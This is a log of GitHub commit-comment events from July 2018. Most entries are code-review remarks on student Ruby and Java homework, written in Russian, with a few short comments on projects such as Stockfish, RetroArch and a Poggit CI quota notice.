{"id":"8034278911","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29875320,"position":21,"line":21,"path":"Lesson3/train.rb","commit_id":"b3b50dedcec4e9e11b9f259dd3b223a24b08a6ab","created_at":"2018-07-29T16:46:56Z","updated_at":"2018-07-29T16:46:56Z","author_association":"NONE","body":"в задании:\r\n\"Может тормозить (сбрасывать скорость до нуля)\"\r\n\r\nметод реализован в виде стопкрана, т.е. скорость сразу сбрасывается до нуля\r\n(в задании возможно не очень ясная формулировка, но она означает, что поезд может тормозить и это не обязательно должно быть полное торможение, фраза же \"сбрасывать скорость до нуля\" означает, \"обратите внимание! скорость не должна быть меньше нуля\" :) )\r\n\r\nлучше, чтобы метод принимал значение (аналогично `add_speed`)"}},"created_at":"2018-07-29T16:46:56Z"}
{"id":"8034278975","type":"CommitCommentEvent","actor":{"login":"jhc5000"},"repo":{"name":"1806-jun25-net/CloudCipher-project2"},"payload":{"comment":{"id":29875321,"position":null,"line":null,"path":null,"commit_id":"9040119f2ecd3c48275a48332a7b3fa1122eca51","created_at":"2018-07-29T16:46:58Z","updated_at":"2018-07-29T16:46:58Z","author_association":"COLLABORATOR","body":"Sorry about the commit msg. Basically this commit adds Swashbuckle, Identity, and an Account Controller.\r\nI created a migration for the IdentityDbContext in the web api proj as well"}},"created_at":"2018-07-29T16:46:58Z"}
{"id":"8034278992","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29875322,"position":10,"line":10,"path":"src/lesson7/Shape.java","commit_id":"ff1792bb7d1448cee43870f6d2d20471d05d3424","created_at":"2018-07-29T16:46:59Z","updated_at":"2018-07-29T16:46:59Z","author_association":"NONE","body":"почему shape2? Стараться избегать в названии цифр, и в данном случае подшло бы прекрасно просто shape"}},"created_at":"2018-07-29T16:46:59Z"}
{"id":"8034279088","type":"CommitCommentEvent","actor":{"login":"miguel-l"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29875323,"position":null,"line":null,"path":null,"commit_id":"c08e05b494d54c7fc28621204382d77d3595d436","created_at":"2018-07-29T16:47:04Z","updated_at":"2018-07-29T16:47:04Z","author_association":"NONE","body":"I know they are within error margins of each other, but it seems suspicious that this would pass an [0,4] but show less ELO on two different regression tests with this as the only difference (as far as I'm aware). Perhaps I'll run some more tests for verification when I get back."}},"created_at":"2018-07-29T16:47:04Z"}
{"id":"8034279594","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29875324,"position":32,"line":32,"path":"Lesson3/train.rb","commit_id":"b3b50dedcec4e9e11b9f259dd3b223a24b08a6ab","created_at":"2018-07-29T16:47:24Z","updated_at":"2018-07-29T16:47:24Z","author_association":"NONE","body":"а если вагонов нет? \r\nпойдем в минус"}},"created_at":"2018-07-29T16:47:24Z"}
{"id":"8034279971","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29875325,"position":25,"line":25,"path":"Lesson3/train.rb","commit_id":"b3b50dedcec4e9e11b9f259dd3b223a24b08a6ab","created_at":"2018-07-29T16:47:41Z","updated_at":"2018-07-29T16:47:41Z","author_association":"NONE","body":"опять неверный и ненужный метод"}},"created_at":"2018-07-29T16:47:41Z"}
{"id":"8034280126","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29875326,"position":6,"line":6,"path":"src/lesson7/ShapeUtils.java","commit_id":"ff1792bb7d1448cee43870f6d2d20471d05d3424","created_at":"2018-07-29T16:47:48Z","updated_at":"2018-07-29T16:47:48Z","author_association":"NONE","body":"утилитный класс final и private конструктор"}},"created_at":"2018-07-29T16:47:48Z"}
{"id":"8034280237","type":"CommitCommentEvent","actor":{"login":"Lisss13"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29875327,"position":14,"line":14,"path":"2/first.rb","commit_id":"c11f7c37f3e9417c2e5b9cfbcc23dfa078d69981","created_at":"2018-07-29T16:47:52Z","updated_at":"2018-07-29T16:47:52Z","author_association":"OWNER","body":"я хотел сначала так сделать но подуми зачем если нам надо все равно их выводит "}},"created_at":"2018-07-29T16:47:52Z"}
{"id":"8034280966","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29875328,"position":8,"line":8,"path":"src/lesson7/ShapeUtils.java","commit_id":"ff1792bb7d1448cee43870f6d2d20471d05d3424","created_at":"2018-07-29T16:48:21Z","updated_at":"2018-07-29T16:48:21Z","author_association":"NONE","body":"странный метод, не находишь?)\r\nпринимает тип Triangle и проверяет, является ли он Triangle"}},"created_at":"2018-07-29T16:48:21Z"}
{"id":"8034281524","type":"CommitCommentEvent","actor":{"login":"brentadamson"},"repo":{"name":"jivesearch/jivesearch"},"payload":{"comment":{"id":29875330,"position":null,"line":null,"path":null,"commit_id":"e1471d40b47fbfb660e5b6aab570e6708d6dea0f","created_at":"2018-07-29T16:48:45Z","updated_at":"2018-07-29T16:48:45Z","author_association":"MEMBER","body":"#49 "}},"created_at":"2018-07-29T16:48:45Z"}
{"id":"8034282219","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29875333,"position":20,"line":20,"path":"src/lesson7/ShapeUtils.java","commit_id":"ff1792bb7d1448cee43870f6d2d20471d05d3424","created_at":"2018-07-29T16:49:14Z","updated_at":"2018-07-29T16:49:14Z","author_association":"NONE","body":"то же самое и здесь. Задача была в том, чтобы методы принимали фигуру! т.е. базовый класс и определяли, является ли она труегольником или еще кем-то"}},"created_at":"2018-07-29T16:49:14Z"}
{"id":"8034282316","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":29875334,"position":null,"line":null,"path":null,"commit_id":"f561d941956c56be4fb3aa6ccd15a2e7706a439f","created_at":"2018-07-29T16:49:19Z","updated_at":"2018-07-29T16:49:19Z","author_association":"CONTRIBUTOR","body":"It can also be a yad script... i just run pmusic and boy how i regret\nit, it's taking forever to scan my hard drive full of repos, code\nsources and stuff\n\nI could improve this, but need some generous donations first\n"}},"created_at":"2018-07-29T16:49:19Z"}
{"id":"8034282757","type":"CommitCommentEvent","actor":{"login":"Marko4123"},"repo":{"name":"Marko4123/portfolio"},"payload":{"comment":{"id":29875335,"position":4,"line":4,"path":"sass/_config.scss","commit_id":"e1307137bffd8902fafb6df801add6607674e7d2","created_at":"2018-07-29T16:49:38Z","updated_at":"2018-07-29T16:49:38Z","author_association":"OWNER","body":"Test"}},"created_at":"2018-07-29T16:49:38Z"}
{"id":"8034283528","type":"CommitCommentEvent","actor":{"login":"AlexSytUa"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29875340,"position":32,"line":32,"path":"Lesson3/train.rb","commit_id":"b3b50dedcec4e9e11b9f259dd3b223a24b08a6ab","created_at":"2018-07-29T16:50:12Z","updated_at":"2018-07-29T16:50:12Z","author_association":"OWNER","body":"По условиям задания ведь не сказано вводить какую либо проверку на отсутствие/присутствие вагонов? Надо такие проверки самому додумывать? )"}},"created_at":"2018-07-29T16:50:12Z"}
{"id":"8034284267","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29875342,"position":16,"line":16,"path":"src/lesson9/AverageScoreComparator.java","commit_id":"ff1792bb7d1448cee43870f6d2d20471d05d3424","created_at":"2018-07-29T16:50:43Z","updated_at":"2018-07-29T16:50:43Z","author_association":"NONE","body":"1. Нет скобочек в последнем else\r\n2. Стараться использовать один return из цикла\r\n3. Есть в классе Double так же как и в Integer статический метод для сравнения, вот его и используем"}},"created_at":"2018-07-29T16:50:43Z"}
{"id":"8034284692","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29875345,"position":10,"line":10,"path":"src/lesson9/FirstLastNameComparator.java","commit_id":"ff1792bb7d1448cee43870f6d2d20471d05d3424","created_at":"2018-07-29T16:51:01Z","updated_at":"2018-07-29T16:51:01Z","author_association":"NONE","body":"почему столько пропусков строк? одной достаточно"}},"created_at":"2018-07-29T16:51:01Z"}
{"id":"8034285190","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29875346,"position":7,"line":7,"path":"src/lesson9/Student.java","commit_id":"ff1792bb7d1448cee43870f6d2d20471d05d3424","created_at":"2018-07-29T16:51:21Z","updated_at":"2018-07-29T16:51:21Z","author_association":"NONE","body":"между классом и полями - пропуск"}},"created_at":"2018-07-29T16:51:21Z"}
{"id":"8034285923","type":"CommitCommentEvent","actor":{"login":"tooky"},"repo":{"name":"cucumber-ltd/feynman"},"payload":{"comment":{"id":29875350,"position":null,"line":null,"path":null,"commit_id":"f6a42621964639ea9e0b121abb6d814747b30ad4","created_at":"2018-07-29T16:51:52Z","updated_at":"2018-07-29T16:51:52Z","author_association":"CONTRIBUTOR","body":"I don't like the names either.\r\n\r\nI'm not sure I really like the way they are used. I'd like to README drive the user level API for defining tasks."}},"created_at":"2018-07-29T16:51:52Z"}
{"id":"8034286298","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29875355,"position":10,"line":10,"path":"sysutils/packer/Portfile","commit_id":"d6f358ff080464824885ed8063573077749dff43","created_at":"2018-07-29T16:52:07Z","updated_at":"2018-07-29T16:52:07Z","author_association":"MEMBER","body":"> @yan12125 We should have caught this before merging, FYI.\r\n\r\nAbsolutely right. On the other hand, I'm curious if it's feasible to add a command to check whether email addresses are valid or not in Travis CI tests. There's a list of current developers in the [Wiki](https://trac.macports.org/wiki/MacPortsDevelopers)"}},"created_at":"2018-07-29T16:52:07Z"}
{"id":"8034286442","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29875356,"position":43,"line":43,"path":"src/lesson9/Task1.java","commit_id":"ff1792bb7d1448cee43870f6d2d20471d05d3424","created_at":"2018-07-29T16:52:13Z","updated_at":"2018-07-29T16:52:13Z","author_association":"NONE","body":"в методе main только проверка написанного, все остальное выносим в отдельные классы (утилитные например)"}},"created_at":"2018-07-29T16:52:13Z"}
{"id":"8034286492","type":"CommitCommentEvent","actor":{"login":"Ravi123kirans"},"repo":{"name":"Ravi123kirans/datasciencecoursera"},"payload":{"comment":{"id":29875357,"position":null,"line":null,"path":null,"commit_id":"409fb76359265c4c745b08272b0bb94f56ee728c","created_at":"2018-07-29T16:52:16Z","updated_at":"2018-07-29T16:52:16Z","author_association":"OWNER","body":"Updated"}},"created_at":"2018-07-29T16:52:16Z"}
{"id":"8034286620","type":"CommitCommentEvent","actor":{"login":"Lisss13"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29875359,"position":8,"line":8,"path":"2/fourth.rb","commit_id":"c11f7c37f3e9417c2e5b9cfbcc23dfa078d69981","created_at":"2018-07-29T16:52:20Z","updated_at":"2018-07-29T16:52:20Z","author_association":"OWNER","body":"так выполняет или нет? "}},"created_at":"2018-07-29T16:52:20Z"}
{"id":"8034286964","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29875361,"position":39,"line":39,"path":"src/lesson9/Task1.java","commit_id":"ff1792bb7d1448cee43870f6d2d20471d05d3424","created_at":"2018-07-29T16:52:36Z","updated_at":"2018-07-29T16:52:36Z","author_association":"NONE","body":"никакого хардкода и магических чисел, все выносим в константы"}},"created_at":"2018-07-29T16:52:36Z"}
{"id":"8034287985","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29875362,"position":35,"line":35,"path":"src/lesson9/Task1.java","commit_id":"ff1792bb7d1448cee43870f6d2d20471d05d3424","created_at":"2018-07-29T16:53:20Z","updated_at":"2018-07-29T16:53:20Z","author_association":"NONE","body":"ты не сделал копирование, ты просто ссылку новую создал на ту же область памяти, поэтому поменяется как твой list, так и listCopy. В данном случае не надо просто ничего возвращать из функции markLength4"}},"created_at":"2018-07-29T16:53:20Z"}
{"id":"8034288830","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29875367,"position":41,"line":41,"path":"src/lesson9/Task2.java","commit_id":"ff1792bb7d1448cee43870f6d2d20471d05d3424","created_at":"2018-07-29T16:53:55Z","updated_at":"2018-07-29T16:53:55Z","author_association":"NONE","body":"зачем в каждой итерации вызывать метод findMax? Один раз и все"}},"created_at":"2018-07-29T16:53:55Z"}
{"id":"8034290859","type":"CommitCommentEvent","actor":{"login":"chuwy"},"repo":{"name":"reponche/Weatherbot"},"payload":{"comment":{"id":29875372,"position":5,"line":5,"path":"get_temp.py","commit_id":"71c787316b1ca704b05f4baa9c312dd9acbdbeed","created_at":"2018-07-29T16:55:22Z","updated_at":"2018-07-29T16:55:22Z","author_association":"NONE","body":"Все эти параметры должны собираться из словаря, а не конкатенироваться."}},"created_at":"2018-07-29T16:55:22Z"}
{"id":"8034292030","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29875377,"position":5,"line":5,"path":"src/Modul1/hw6Inheritance/Circle.java","commit_id":"3179453fafde31c99d4582ab35740f04a819cae7","created_at":"2018-07-29T16:56:12Z","updated_at":"2018-07-29T16:56:12Z","author_association":"NONE","body":"отступ между классом и полями"}},"created_at":"2018-07-29T16:56:12Z"}
{"id":"8034292477","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29875378,"position":5,"line":5,"path":"src/Modul1/hw6Inheritance/Circle.java","commit_id":"3179453fafde31c99d4582ab35740f04a819cae7","created_at":"2018-07-29T16:56:31Z","updated_at":"2018-07-29T16:56:31Z","author_association":"NONE","body":"окружность \"является\" точкой? Не правильно использовано наследование"}},"created_at":"2018-07-29T16:56:31Z"}
{"id":"8034293018","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29875382,"position":35,"line":35,"path":"src/Modul1/hw6Inheritance/Circle.java","commit_id":"3179453fafde31c99d4582ab35740f04a819cae7","created_at":"2018-07-29T16:56:57Z","updated_at":"2018-07-29T16:56:57Z","author_association":"NONE","body":"код не отформатирован"}},"created_at":"2018-07-29T16:56:57Z"}
{"id":"8034293474","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29875383,"position":33,"line":33,"path":"src/Modul1/hw6Inheritance/Circle.java","commit_id":"3179453fafde31c99d4582ab35740f04a819cae7","created_at":"2018-07-29T16:57:15Z","updated_at":"2018-07-29T16:57:15Z","author_association":"NONE","body":"не нужно использовать скобочек вокруг того, что возвращаешь, ухудшает читаемость кода"}},"created_at":"2018-07-29T16:57:15Z"}
{"id":"8034293495","type":"CommitCommentEvent","actor":{"login":"kunalsanhotra"},"repo":{"name":"kunalsanhotra/-Food-Delivery-project"},"payload":{"comment":{"id":29875384,"position":null,"line":null,"path":null,"commit_id":"aedaf6899c94e7022d0198a84315453bf1dcc5e5","created_at":"2018-07-29T16:57:16Z","updated_at":"2018-07-29T16:57:16Z","author_association":"OWNER","body":"first program on c++"}},"created_at":"2018-07-29T16:57:16Z"}
{"id":"8034294332","type":"CommitCommentEvent","actor":{"login":"peabee"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":29875386,"position":null,"line":null,"path":null,"commit_id":"f561d941956c56be4fb3aa6ccd15a2e7706a439f","created_at":"2018-07-29T16:57:52Z","updated_at":"2018-07-29T16:57:52Z","author_association":"CONTRIBUTOR","body":"A petbuild would be good if it's staying as a compiled binary....the .c contains the compile rune.\r\nhttp://distro.ibiblio.org/puppylinux/sources/p/pmusic_PLUGIN_trayapp-0.5-source.tar.gz\r\ncontains the .c and the /usr/local/pmusic/plugins/pmusic_trayapp.rc\r\nso it's \"captured\".... ;-)"}},"created_at":"2018-07-29T16:57:52Z"}
{"id":"8034294340","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29875387,"position":2,"line":2,"path":"src/Modul1/hw6Inheritance/Demo.java","commit_id":"3179453fafde31c99d4582ab35740f04a819cae7","created_at":"2018-07-29T16:57:52Z","updated_at":"2018-07-29T16:57:52Z","author_association":"NONE","body":"комментарии надо писать правильно, читаем код конвеншен!"}},"created_at":"2018-07-29T16:57:52Z"}
{"id":"8034294542","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29875388,"position":4,"line":4,"path":"src/Modul1/hw6Inheritance/Demo.java","commit_id":"3179453fafde31c99d4582ab35740f04a819cae7","created_at":"2018-07-29T16:58:01Z","updated_at":"2018-07-29T16:58:01Z","author_association":"NONE","body":"отступ между классом и методом"}},"created_at":"2018-07-29T16:58:01Z"}
{"id":"8034294682","type":"CommitCommentEvent","actor":{"login":"kPherox"},"repo":{"name":"kPherox/MyFleetGirls"},"payload":{"comment":{"id":29875389,"position":null,"line":null,"path":null,"commit_id":"afc2eb1ed08b47152f62f8775387d9187dfca3e2","created_at":"2018-07-29T16:58:07Z","updated_at":"2018-07-29T16:58:07Z","author_association":"OWNER","body":"既存のデータベースを修正する場合は次のSQLを実行する\r\n```sql\r\nUPDATE\r\n  remodel, ship\r\nSET\r\n  remodel.second_ship_id = ship.ship_id\r\nWHERE\r\n  remodel.second_ship_id = ship.id\r\n  AND remodel.member_id  = ship.member_id\r\n```"}},"created_at":"2018-07-29T16:58:07Z"}
{"id":"8034295055","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29875391,"position":3,"line":3,"path":"src/Modul1/hw6Inheritance/DiagonalOfFigure.java","commit_id":"3179453fafde31c99d4582ab35740f04a819cae7","created_at":"2018-07-29T16:58:20Z","updated_at":"2018-07-29T16:58:20Z","author_association":"NONE","body":"отступ между классом/интерфейсом и методом"}},"created_at":"2018-07-29T16:58:20Z"}
{"id":"8034296044","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29875396,"position":8,"line":8,"path":"src/Modul1/hw6Inheritance/Ellipse.java","commit_id":"3179453fafde31c99d4582ab35740f04a819cae7","created_at":"2018-07-29T16:59:02Z","updated_at":"2018-07-29T16:59:02Z","author_association":"NONE","body":"интересно, элипс задается разве двумя радиусами?)"}},"created_at":"2018-07-29T16:59:02Z"}
{"id":"8034296314","type":"CommitCommentEvent","actor":{"login":"Michael-N"},"repo":{"name":"Michael-N/Simple-Cryptography"},"payload":{"comment":{"id":29875397,"position":null,"line":null,"path":null,"commit_id":"56758a7706ad9e30ed375eddae37026d41f59a44","created_at":"2018-07-29T16:59:12Z","updated_at":"2018-07-29T16:59:12Z","author_association":"OWNER","body":"__UPDATE__ moved to __enigma__ branch"}},"created_at":"2018-07-29T16:59:12Z"}
{"id":"8034296646","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29875399,"position":31,"line":31,"path":"src/Modul1/hw6Inheritance/Ellipse.java","commit_id":"3179453fafde31c99d4582ab35740f04a819cae7","created_at":"2018-07-29T16:59:26Z","updated_at":"2018-07-29T16:59:26Z","author_association":"NONE","body":"зачем переопределять, если ничем не отличается реализация?"}},"created_at":"2018-07-29T16:59:26Z"}
{"id":"8034297425","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29875405,"position":15,"line":15,"path":"src/Modul1/hw6Inheritance/Line.java","commit_id":"3179453fafde31c99d4582ab35740f04a819cae7","created_at":"2018-07-29T16:59:56Z","updated_at":"2018-07-29T16:59:56Z","author_association":"NONE","body":"дистанцию можно рассчитать, зачем ее хранить как поле класса?"}},"created_at":"2018-07-29T16:59:56Z"}
{"id":"8034297702","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29875410,"position":50,"line":50,"path":"src/Modul1/hw6Inheritance/Point.java","commit_id":"3179453fafde31c99d4582ab35740f04a819cae7","created_at":"2018-07-29T17:00:08Z","updated_at":"2018-07-29T17:00:08Z","author_association":"NONE","body":"код вообще нигде не отформатирован!"}},"created_at":"2018-07-29T17:00:08Z"}
{"id":"8034298723","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29875418,"position":47,"line":47,"path":"src/Modul1/hw6Inheritance/Point.java","commit_id":"3179453fafde31c99d4582ab35740f04a819cae7","created_at":"2018-07-29T17:00:41Z","updated_at":"2018-07-29T17:00:41Z","author_association":"NONE","body":"ничего не смущает, что у точки есть площать?"}},"created_at":"2018-07-29T17:00:41Z"}
{"id":"8034298913","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29875419,"position":7,"line":7,"path":"src/Modul1/hw6Inheritance/Rectangle.java","commit_id":"3179453fafde31c99d4582ab35740f04a819cae7","created_at":"2018-07-29T17:00:49Z","updated_at":"2018-07-29T17:00:49Z","author_association":"NONE","body":"1 отступ"}},"created_at":"2018-07-29T17:00:49Z"}
{"id":"8034299691","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29875426,"position":31,"line":31,"path":"src/Modul1/hw6Inheritance/Rectangle.java","commit_id":"3179453fafde31c99d4582ab35740f04a819cae7","created_at":"2018-07-29T17:01:21Z","updated_at":"2018-07-29T17:01:21Z","author_association":"NONE","body":"если переопределяешь методы базового класса, то ставь аннотацию Override"}},"created_at":"2018-07-29T17:01:21Z"}
{"id":"8034300246","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29875428,"position":30,"line":30,"path":"src/Modul1/hw7collection/Task1/Task1.java","commit_id":"3179453fafde31c99d4582ab35740f04a819cae7","created_at":"2018-07-29T17:01:46Z","updated_at":"2018-07-29T17:01:46Z","author_association":"NONE","body":"никакого хардкода и магических чисел, все выносим в константы"}},"created_at":"2018-07-29T17:01:46Z"}
{"id":"8034300591","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29875432,"position":39,"line":39,"path":"src/Modul1/hw7collection/Task1/Task1.java","commit_id":"3179453fafde31c99d4582ab35740f04a819cae7","created_at":"2018-07-29T17:01:59Z","updated_at":"2018-07-29T17:01:59Z","author_association":"NONE","body":"в методе main только проверка написанного, все остальное выносим в отдельные классы (утилитные например)"}},"created_at":"2018-07-29T17:01:59Z"}
{"id":"8034301053","type":"CommitCommentEvent","actor":{"login":"Shana6"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29875433,"position":null,"line":null,"path":null,"commit_id":"33cce4a38121a628740a3001a944c73ef53acc05","created_at":"2018-07-29T17:02:17Z","updated_at":"2018-07-29T17:02:17Z","author_association":"CONTRIBUTOR","body":"<@201745963394531328> test.exe"}},"created_at":"2018-07-29T17:02:17Z"}
{"id":"8034301663","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29875435,"position":10,"line":10,"path":"src/Modul1/hw7collection/students/NameSernameComparator.java","commit_id":"3179453fafde31c99d4582ab35740f04a819cae7","created_at":"2018-07-29T17:02:45Z","updated_at":"2018-07-29T17:02:45Z","author_association":"NONE","body":"плохой вариант, лучше использовать отдельно сравнение имени и отчества! по памяти неэффективно"}},"created_at":"2018-07-29T17:02:45Z"}
{"id":"8034302606","type":"CommitCommentEvent","actor":{"login":"alexanderschaubert"},"repo":{"name":"alexanderschaubert/HTML"},"payload":{"comment":{"id":29875436,"position":6,"line":33,"path":"html_simple/linux.html","commit_id":"59be22cd4d5dc68b90fd2c1131d7f081b5af47e8","created_at":"2018-07-29T17:03:22Z","updated_at":"2018-07-29T17:03:22Z","author_association":"OWNER","body":"good ideea"}},"created_at":"2018-07-29T17:03:22Z"}
{"id":"8034303260","type":"CommitCommentEvent","actor":{"login":"Crisspl"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29875438,"position":null,"line":null,"path":null,"commit_id":"0ecf99025e24c9561d911ac63800192549542819","created_at":"2018-07-29T17:03:50Z","updated_at":"2018-07-29T17:03:50Z","author_association":"OWNER","body":"Why wouldn't be there a need?"}},"created_at":"2018-07-29T17:03:50Z"}
{"id":"8034304166","type":"CommitCommentEvent","actor":{"login":"tkshivaprasad"},"repo":{"name":"tkshivaprasad/Python-ClassDemos"},"payload":{"comment":{"id":29875442,"position":null,"line":null,"path":null,"commit_id":"b5fcf7a00e79e25a101c73049e958b793656d3d0","created_at":"2018-07-29T17:04:27Z","updated_at":"2018-07-29T17:04:27Z","author_association":"OWNER","body":"[ex1data1.txt](https://github.com/tkshivaprasad/Python-ClassDemos/files/2238996/ex1data1.txt)\r\n[ex1data2.txt](https://github.com/tkshivaprasad/Python-ClassDemos/files/2238997/ex1data2.txt)\r\n[ex1data3.txt](https://github.com/tkshivaprasad/Python-ClassDemos/files/2238998/ex1data3.txt)\r\n[ex1data4.txt](https://github.com/tkshivaprasad/Python-ClassDemos/files/2238999/ex1data4.txt)\r\n[ex1data5.txt](https://github.com/tkshivaprasad/Python-ClassDemos/files/2239000/ex1data5.txt)\r\n\r\n"}},"created_at":"2018-07-29T17:04:27Z"}
{"id":"8034304441","type":"CommitCommentEvent","actor":{"login":"Crisspl"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29875443,"position":23,"line":33,"path":"include/CObjectCache.h","commit_id":"0ecf99025e24c9561d911ac63800192549542819","created_at":"2018-07-29T17:04:39Z","updated_at":"2018-07-29T17:04:39Z","author_association":"OWNER","body":"But why? And to what?"}},"created_at":"2018-07-29T17:04:39Z"}
{"id":"8034306390","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"AirCow/MegaShop2"},"payload":{"comment":{"id":29875450,"position":null,"line":null,"path":null,"commit_id":"ebee6ed840f3da1feef43a79eaeb3e15e14cdf86","created_at":"2018-07-29T17:05:57Z","updated_at":"2018-07-29T17:05:57Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 6\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/AirCow/MegaShop2/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `a815ccec-9351-11e8-9a22-7b79f1d41d7e`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-29T17:05:57Z"}
{"id":"8034306403","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/RetroArch"},"payload":{"comment":{"id":29875451,"position":null,"line":null,"path":null,"commit_id":"7131b969d887fc61d510b28eeb273486cdedf210","created_at":"2018-07-29T17:05:58Z","updated_at":"2018-07-29T17:05:58Z","author_association":"MEMBER","body":"@RetroSven I had to push several patches to get things to compile again on Android. Try testing if things still work fine on your end.\r\n\r\nAlso, in future, try to avoid these kinds of scenarios since they are known to cause issues with the Android compilers -\r\n\r\n'[exec] jni/../../../../griffin/../menu/cbs/menu_cbs_right.c:288:34: error: format string is not a string literal (potentially insecure) [-Werror,-Wformat-security]\r\n     [exec]       snprintf(msg, sizeof(msg), msg_hash_to_str(MSG_CHEAT_DELETE_ALL_SUCCESS)) ;\r\n     [exec]                                  ^~~~~~~~~~~~~'"}},"created_at":"2018-07-29T17:05:58Z"}
